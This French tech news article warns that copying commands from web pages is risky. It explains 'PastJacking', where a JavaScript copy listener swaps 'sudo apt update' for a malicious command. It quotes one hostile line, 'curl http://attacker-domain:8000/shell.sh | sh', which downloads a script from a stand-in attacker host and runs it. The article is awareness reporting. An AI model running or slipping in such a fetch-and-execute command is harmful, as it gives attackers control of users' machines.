Piratage : Copier-coller des commandes issues d’une page web peut être très dangereux !

Les programmeurs, les administrateurs système, les chercheurs en sécurité ou encore ceux qui aiment bidouiller sur leur PC ont pour habitude de copier-coller des commandes couramment utilisés à partir d'une page web. Seulement et comme le rappelle le spécialiste Gabriel Friedlander, cette pratique n'est pas sans risque. Loin de là.

copier-coller danger
Crédits : Pixabay

Le copier-coller fait partie des manipulations les plus utilisées, que ce soit par les utilisateurs lambda, les programmeurs, les administrateur système, les chercheurs en sécurité informatique ou encore ceux qui aiment bidouiller sur leur PC. Seulement, Gabriel Friendlander, fondateur de la plateforme de formation à la sécurité informatique Wizer, tient à rappeler que cette pratique est loin d'être sans risque, notamment lorsqu'il s'agit de copier-coller des commandes affichées sur des pages Web.

En effet, il n'est pas rare que les développeurs, novices comme expérimentés, copient-collent des commandes couramment utilisées à partir d'une page web (StackOverflow par exemple) dans leurs applications, dans une invite de commande Windows ou dans un terminal Linux.

Mais comme le rappelle M. Friendlander, il existe une méthode qui permet à un attaquant de modifier le contenu de votre presse papier. Le PastJacking, c'est son nom, consiste à l'introduction de lignes de codes malveillantes qui seront automatiquement exécutées lorsque l'utilisateur va coller son texte dans une fenêtre de terminal. Dans une preuve de concept plutôt simple publiée sur son blog personnel, M. Friedlander demande aux lecteurs de copier une commande que la plupart des administrateurs système et des développeurs connaissent : sudo apt udpate (ndrl : une commande utilisée pour récupérer des informations mises à jour sur les logiciels installés sur votre système).

À lire également : Windows 11 – Microsoft veut révolutionner le copier-coller sur Edge et Chrome

Un copier-coller peut faire de gros dégâts

En copiant-collant cette commande dans une zone de texte ou un bloc-note, on se rend compte que le contenu est totalement différent. En effet, la commande sudo apt update est devenue curl http://attacker-domain:8000/shell.sh | sh. En réalité, la supercherie se trouve dans le code Javascript caché derrière la page HTML de la preuve de concept mise en place par Friendlander.

Pour faire simple, dès que vous copiez la commande “sudo apt update” dans un élément HTML, le bout de code malveillant affiché ci-dessous s'exécute. Plus précisément, c'est un écouteur d'évènements Javascript qui capture l'évènement de copie et remplace les données du presse-papiers par le code malveillant de M. Friedlander. “C'est pourquoi vous ne devriez jamais copier-coller des commandes directement dans votre terminal […] Il suffit d'une seule ligne de code injectée dans le code que vous avez copié pour créer une porte dérobée dans votre application. Cette attaque est très simple, mais particulièrement efficace”, prévient-il.

Source : Bleeding Computer


Abonnez-vous gratuitement à la newsletter

Chaque jour, le meilleur de Phonandroid dans votre boite mail !

Réagissez à cet article !

Demandez nos derniers articles !

OpenAI flambe chaque jour une somme hallucinante sur Sora 2, les pertes sont colossales

Une enquête révèle combien OpenAI dépense quotidiennement pour maintenir son générateur de vidéos IA Sora 2. En sachant que l’outil ne lui rapporte quasiment rien pour compenser. Si vous suivez…

IA

Le nouvel adaptateur sans fil pour Android Auto de Motorola se dévoile en avance

Successeur du très populaire Motorola MA1, le logiquement nommé MA2 se révèle avant sa sortie à travers plusieurs photos détaillées. Voici à quoi va ressembler l’appareil. S’il est possible de…

NordVPN fête son anniversaire avec une grosse réduction et 3 mois offerts

À l’occasion de son 14e anniversaire, NordVPN lance une offre spéciale qui fait fondre ses prix jusqu’à 76%. Une opportunité pour protéger vos appareils et profiter d’internet sans restriction, le…

Samsung Galaxy S25 FE : le smartphone premium passe à petit prix avec ces 3 offres cumulables !

Boulanger propose en ce moment trois offres promotionnelles cumulables sur le Samsung Galaxy S25 FE. Cela vous permet de faire baisser considérablement le prix de cet excellent smartphone. On vous…

Cette marque impose sa suprématie sur le marché des smartphones actifs : 1 appareil sur 4 lui appartient

Le parc mondial des smartphones actifs est aux mains de huit fabricants : ensemble, ils concentrent 80 % du marché. Mais parmi eux, deux acteurs tirent leur épingle du jeu et,…

La Twingo électrique à moins de 16 000 € surprend avec ses équipements de série

La Twingo électrique se décline enfin dans sa version la plus abordable. Renault ouvre les commandes pour cette finition d’entrée de gamme très attendue. À ce prix, son niveau d’équipement…

Windows 11 26H1 : Microsoft éclaircit un point crucial concernant la mise à jour

Les futures mises à jour de Windows 11 numérotées 26H1 et 26H2 vous laissent perplexes ? Microsoft précise quelques aspects importants afin que vous sachiez à quoi vous attendre exactement….

Bon plan Apple Watch Series 10 : la montre connectée passe à prix mini sur Boulanger, vite !

Vous rêvez de vous offrir une Apple Watch, mais vous attendez une belle promotion pour craquer ? Ce bon plan est fait pour vous ! Alors qu’elle était affiché 479…

En manque de Stranger Things ? Netflix a une excellente nouvelle pour vous

Si pour vous il n’y a jamais assez de Stranger Things, vous allez être ravi d’apprendre ce que prépare Netflix pour les fans de la série. Le Monde à l’envers…

Vite, les AirPods 4 ANC passent à petit prix, mais aujourd’hui seulement !

Les AirPods 4 ANC sont actuellement à prix cassé sur Rakuten grâce à cette offre flash. Déjà en promotion, les écouteurs d’Apple passent à 144,99 € seulement avec le code RAKUTEN5….